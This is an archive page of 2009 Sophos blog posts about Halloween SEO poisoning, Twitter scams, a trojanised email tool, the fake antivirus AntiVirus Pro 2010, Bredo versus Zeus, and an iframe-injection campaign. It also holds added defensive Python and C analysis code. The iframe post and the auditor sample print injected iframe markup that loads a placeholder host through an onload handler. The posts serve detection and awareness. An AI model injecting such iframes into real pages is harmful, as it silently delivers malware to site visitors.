Sophos

Archive for October, 2009

There’s Malware on Elm Street this Halloween … with pumpkins!


It appears that this Halloween the malware writers’ preferred infection vector is SEO (Search Engine Optimization) techniques used to poison popular search terms.

We at SophosLabs have seen relatively few email campaigns exploiting Halloween this year, but there have been plenty of campaigns pushing malware-loaded URLs into festive search terms.

We have various Fake AV families featuring highly:

and

Which leads to the familiar:

and

There are also families that pose as fake media codecs exploiting Halloween to push their wares:

As users wise up to the dangers of email attachments, we are seeing SEO poisoning become a more and more popular attack vector.

Sophos detects this year’s nightmares variously as Mal/FakeAvJs-A, Mal/Krap-A and Mal/EncPk-LH.


Look and feel great! Try this pill (Or how to make your wallet lighter?)

Another Twitter direct message (DM) scam was happening today, but apparently this time the hook was to prey on users’ vanity. Several messages were seen with the following text:

“I lost 25lbs using this
“whoa this works. i feel good and look good

“lol it’s amazing. look and feel great with

When a user clicked on the link, it redirected them to this site:

Cleanse your colon for free

All you had to do to get your “free” bottle was fill out your name, address, phone number and email. However, once you submitted that, you were taken to a screen asking for your billing information and credit card details. Why do you need to input credit card details for something that’s free? With all that information, the cybercrooks have more than enough to commit identity theft and fraud on your card. They have your name, address and card details, and you’ve even confirmed that the address you gave is the billing address too.

At the risk of sounding preachy, these pills never work. The only thing that gets “slimmer” is your wallet.


Are you old enough to watch this?

I was watching some of the activity on Twitter today and noticed some really odd tweets. There was only one every couple of hours, and while the text “Haha, look at this vid” didn’t change, the link did. It seemed worth checking out.

I followed the link and it went to a fake YouTube page with the following text.

“This video or group may contain content that is inappropriate for some users, as flagged by YouTube’s user community. To view this video or group, please verify you are 18 or older with your cell phone”

Huh?

How does that prove anything to do with your age? I know parents who have given their young children cell phones. I’m guessing this is a great scam to get legitimate phone numbers for those “market affiliates” that call to try to sell you “long term auto insurance” and other such scams.

Definitely more tricks than treats today on Twitter.


No, it’s not you on there

Twitter users should be especially careful this morning as there’s a new Twitter phish campaign going on. The message being seen uses a known tactic: it tries to trick the user into believing there’s some content on the internet about them, whether a photo or a video, and lures them into browsing to the link to find out what it is. Similar tactics have been seen in messages on Facebook and even via email. The message simply states the following.

“hi. this you on here? http://blogger.djh****.com”

The good news is if you do a search on Twitter, you’ll have a hard time finding an example of the original message since there’s an overwhelming number of people tweeting to their friends warning them about this campaign. Slowly but surely, people are learning to be more cautious.


Cooking Your Own Goose

SophosLabs analysts today encountered a strange looking application called “Anonymous E-Mail Sender”.

Interested to download and try this anonymising email doohickey if you’d ever chance upon it?

If you’ve just said “Yes”, you’ve just agreed to installing a Trojan on your computer (detected by Sophos as Troj/Pasta-B).

After filling in the details and hitting the “Send” button, it appears to do what it says. A network packet trace reveals that the application does indeed perform an HTTP POST to a server located at a Russian pornographic website(?).

Given that this application appears to have originated from Russia, I tried accessing the Russian Google website and was surprised to find that my computer was now as slow as molasses in January. What gives?

Unbeknownst to the user, while the Trojan was “chewing the fat” with the remote server, it was also cooking something up, as busy as popcorn on a skillet. It secretly modifies your HOSTS file, thereby blocking or redirecting access to several websites (shown below).

And if you happen to be infected by this Trojan, there’s no point in crying over spilt milk or going bananas. Contact your anti-virus vendor and see if there might be a way to resolve your situation. Your vendor might already have a ready fix available.

Always update your anti-virus software and perform regular updates to your operating system and software. I know the taste of forbidden fruit always seems enticing at first but do refrain from making impulsive decisions. Avoid half-baked applications as you’ll never know when you would end up with egg on your face. Know which side your bread is buttered.

And remember, there is no such thing as a free lunch.

If an application seems even remotely suspicious, it is preferable to err on the side of caution. If it comes from an unknown source, drop it like a hot potato. I prefer my life to be one of a bowl of cherries than to one of eating humble pie all the time.

PS: I think I’ve been watching too many Masterchef/TopChef episodes… I really need to lay off the sauce. Back to the “salt” mines… :-)


How AntiVirus Pro 2010 finds “malware”

“AntiVirus Pro 2010” is one of the most infamous Fake Antivirus malware families.

Usually it manages to penetrate a user’s computer via a small downloader. Once installed, it attempts to download further components associated with this malware. After a few minutes, it starts to display warnings such as “Privacy alert! - Your system was found to be infected with intercepting programs…”


It displays a main window offering a “scan now” option which, when activated, detects non-existent malware. This non-existent malware can range from scripts to rootkits.

Let’s look quickly at exactly what it finds. Usually it reports about 10-20 different malware files in the Windows System folder. We now open one of these detected files to find out what it actually is.

; "zekel.dll":
0000:  00 00 00 02 00 00 01 04  01 04 00 06 06 01 0B 03
0010:  04 0A 08 0B 01 14 0C 01  10 01 13 02 11 1C 04 04
0020:  0F 1D 20 04 15 10 20 0D  1B 20 1F 09 17 24 00 19
0030:  2B 10 02 22 1C 17 13 1F  1A 23 17 13 14 2D 21 2C
0040:  0F 35 0C 19 2E 15 30 30  44 01 0C 13 37 1B 19 2F
...
00F0:  CF AC 00 15 09 E2 6D AF  D6 B7 17 AC 9F F9 C1 28
0100:  AD E8 A3 6C 03 3C 90 40  01 87 D0 AD 92 2F 63 0C
0110:  C4 A6 9A D4 B2 E9 6B 27  E9 05 E6 6B 43 5D C2 72
0120:  84 8C D9 A4 FB 98 17 EC  09 13 27 6B 75 14 D0 3A
0130:  25 05 26 53 78 BA 05 07  2A 12 DB 2F 15 61 E2 41
...
3940:  1E 53 D9 F2 EA 74 95 1B  F8 1C 02 10 23 EE 84 BF
3950:  F3 BD F7 95 37 ; EndOfFile

Despite its somewhat wacky name, the file “zekel.dll” is not a DLL (Dynamic Link Library) at all. It is a junk file filled mostly with random bytes.

At first glance it is possible to notice some regularities in these “malicious” files. For example, all files have nulls as their first and second bytes. The next few bytes, for example at offsets 0x02..0x0F, are quite small (always less than 0x0F). What about the next few bytes? They also appear to be “limited”: for example, the bytes at offsets 0x10..0x1F are never more than 0x1F, yet at the same time they look quite random.

If we scrutinize these bytes from the start of the file, we can derive an approximate formula (C notation):

/* Approximate generator: the byte at offset FilePos is rand() % FilePos,
   so every byte is strictly smaller than its own offset. FilePos == 0 is
   special-cased because rand() % 0 is undefined; the dump shows a 0 there.
   Needs <stdlib.h> for rand() and <unistd.h> for write(). */
for (int FilePos = 0; FilePos < FileSize; FilePos++)
{
  unsigned char b = (FilePos > 0) ? rand() % FilePos : 0;
  write(h, &b, 1);   /* h: descriptor of the fake "malware" file being written */
}
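To test this hypothesis against the dump above without having the sample, here is an added Python check (not from the original post): it parses the first five rows printed for “zekel.dll” and verifies that every byte is strictly smaller than its offset, as rand() % FilePos would produce. Only the 80 bytes shown are available, so the check covers offsets 0x00..0x4F.

```python
"""Check the "byte < offset" regularity against the zekel.dll dump rows."""
import re

# First five rows of the dump shown above (offsets 0x0000-0x004F), copied
# from the post; the remaining rows are elided there and so not checked.
DUMP_HEAD = """
0000:  00 00 00 02 00 00 01 04  01 04 00 06 06 01 0B 03
0010:  04 0A 08 0B 01 14 0C 01  10 01 13 02 11 1C 04 04
0020:  0F 1D 20 04 15 10 20 0D  1B 20 1F 09 17 24 00 19
0030:  2B 10 02 22 1C 17 13 1F  1A 23 17 13 14 2D 21 2C
0040:  0F 35 0C 19 2E 15 30 30  44 01 0C 13 37 1B 19 2F
"""


def parse_hexdump(text):
    """Return the bytes of an 'OFFSET:  XX XX ...' dump, checking offsets are contiguous."""
    out = bytearray()
    for line in text.strip().splitlines():
        offset, _, hexpart = line.partition(":")
        if int(offset, 16) != len(out):
            raise ValueError("non-contiguous dump at offset " + offset)
        # Drop a trailing '; comment' (as in '; EndOfFile') and all whitespace.
        out += bytes.fromhex(re.sub(r"\s+", "", hexpart.split(";")[0]))
    return bytes(out)


def violations(data):
    """Offsets p where the rand() % p hypothesis fails, i.e. data[p] >= p.

    Offset 0 must hold 0 (the observed leading null). Beyond offset 255 a
    byte may take any value, so only the first 256 offsets carry evidence.
    """
    limit = min(len(data), 256)
    return [p for p in range(limit) if data[p] >= max(p, 1)]


def looks_like_fake_threat(data):
    """True if the file starts with a null and obeys data[p] < p throughout."""
    return len(data) > 0 and data[0] == 0 and not violations(data)


if __name__ == "__main__":
    sample = parse_hexdump(DUMP_HEAD)
    verdict = "consistent" if looks_like_fake_threat(sample) else "inconsistent"
    print(len(sample), "bytes checked:", verdict, "with rand() % FilePos")
```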

We checked this assumption by analysing the real code of “AntiVirus Pro 2010”. We need to intercept the moment when it starts to open and write these files and decides they are “malware”.

; Inside the "AntiVirus Pro 2010" - algorithm of "fake malware" generation


From the code, it appears that I was correct about how these fake detected files are created. :-)

As a final note, there were no checksums or datestamps… only random junk inside the fake threats of “AntiVirus Pro 2010”.


iframes are EVIL! Hate Zeus!

This morning the security researcher behind the Malware Domain List emailed me after reading Mal/Iframe-N: The next big threat? and pointed me at an interesting compromised website he had noticed.

This JavaScript is non-malicious and will neuter Iframes on a page similar to the Defensive Iframing. It appears that a malware writing team is targeting iframes and Zeus (aka ZBot). Is this the same team as those behind Bredo? Or is there a new Web-based grouping?


Bredo vs. Zeus: The Battle of the Bots continues

The Bredo and Zeus/Zbot malware families are both vying to infect your PC. If these bots are not busy spamming themselves out from an infected endpoint, with either bogus delivery invoices or forged IRS statements, they are scouring the local machine for personal information to steal, bank transactions to manipulate, among a host of other possible nefarious deeds.

But who wants to share? We have seen bots go toe-to-toe with one another before; embedding logic into their armory to block or disable other malware. As such, it comes as no surprise to have seen a recent Bredo sample with additional code to disable installed Zbots. The sample loops through the list of known Zbot executable names…

… and moves any files found to an alternate location, thus disabling Zbot’s path-based auto-start mechanism for subsequent reboots. To combat its own paranoia, the malware sets up a thread to perform this check (along with its own installation logic) forever.

Though disabling Zbots may seem helpful, Bredo malware does far more harm than good. As prevention is often better than the cure, be diligent in your efforts to avoid infection altogether; read e-mail with extra caution and follow safe-computing best-practices.


Mal/Iframe-N: The next big threat?

Since releasing detection for Mal/Iframe-N on Wednesday (21st Oct), SophosLabs has seen a rising number of detections, now running into thousands of affected websites. A couple of the sites hit are well known, and one that I previously talked about as having been infected is the official Van Morrison site.

Even though this site is effectively down for improvement there is still an infection!

I thought that I would take some time to explain a little more about this particular web threat.

What is so special about Mal/Iframe-N?

Normally, malicious iframes have the following form:
<iframe src=http://DOMAIN.TLD width=N height=N> where N is a small number.

Whereas, in the new attack there isn’t a direct src= they use onload= like this:

<iframe onload="if (!this.src){ this.src='http://DOMAIN.TLD'; this.height=N; this.width=N;}"> again N is a small number.

All the domains used so far have been based in Russia.

The tool being used to inject these iframes currently appends them to the end of legitimate HTML.
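An added example, not Sophos code, of how a site owner could audit their own pages for both iframe shapes described above: the parser flags a declared src= with near-zero width and height, and the new no-src form whose onload= handler assigns this.src. The sample HTML, the DOMAIN.TLD placeholder paths and the size threshold of 10 pixels are constructed assumptions.

```python
"""Flag iframes matching the classic tiny-src form and the onload-src form."""
import re
from html.parser import HTMLParser

SMALL = 10  # assumed threshold: width/height at or below this counts as hidden


def _small(value):
    """True if a width/height attribute is a tiny pixel value (e.g. "1", "1px")."""
    digits = re.sub(r"\D", "", value or "")
    return digits != "" and int(digits) <= SMALL


class IframeAudit(HTMLParser):
    """Collect (reason, url) pairs for iframes that look injected."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {name: (val or "") for name, val in attrs}
        # New form: no src= in the markup; an onload= handler assigns this.src.
        m = re.search(r"this\.src\s*=\s*['\"]([^'\"]+)['\"]", a.get("onload", ""))
        if "src" not in a and m:
            self.findings.append(("onload-src", m.group(1)))
        # Classic form: declared src= with near-zero width and height.
        elif "src" in a and _small(a.get("width")) and _small(a.get("height")):
            self.findings.append(("tiny-iframe", a["src"]))


def audit_iframes(html):
    parser = IframeAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: a clean page with two injected iframes appended after
# </html>, which is where the injection tooling described above places them.
SAMPLE = """<html><body><p>hello</p>
<iframe src="https://example.org/video" width="640" height="360"></iframe>
</body></html>
<iframe src=http://DOMAIN.TLD/old width=1 height=1>
<iframe onload="if (!this.src){ this.src='http://DOMAIN.TLD/new'; this.height=1; this.width=1;}">
"""

if __name__ == "__main__":
    for reason, url in audit_iframes(SAMPLE):
        print(reason, url)
```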


Malicious update for Microsoft Outlook / Outlook Express (KB910721)

This morning as I trawled the spam queues a sense of deja-vu descended on me when this subject line caught my eye:

         Update for Microsoft Outlook / Outlook Express (KB910721)

Didn’t I see this a while ago and didn’t it contain a rather nasty Trojan?

The format of the October version differs slightly in that it includes a link to a website from which you may download the ‘Microsoft/Outlook/Outlook Express Update’ rather than an attached executable.

The details have also been updated:

   Quick Details

         * File Name: officexp-KB910721-FullFile-ENU.exe
         * Version: 1.5
         * Date Published: Wed, 21 Oct 2009 16:05:06 +0100
         * Language: English
         * File Size: 100 KB

Fake Microsoft Outlook security update

Of course this is not a Microsoft security update, but rather simply another attempt by the malware authors to fool you into installing their Trojan. Encore une fois.

The advice from Sophos remains the same. Visit the genuine Microsoft update site in order to obtain your fixes.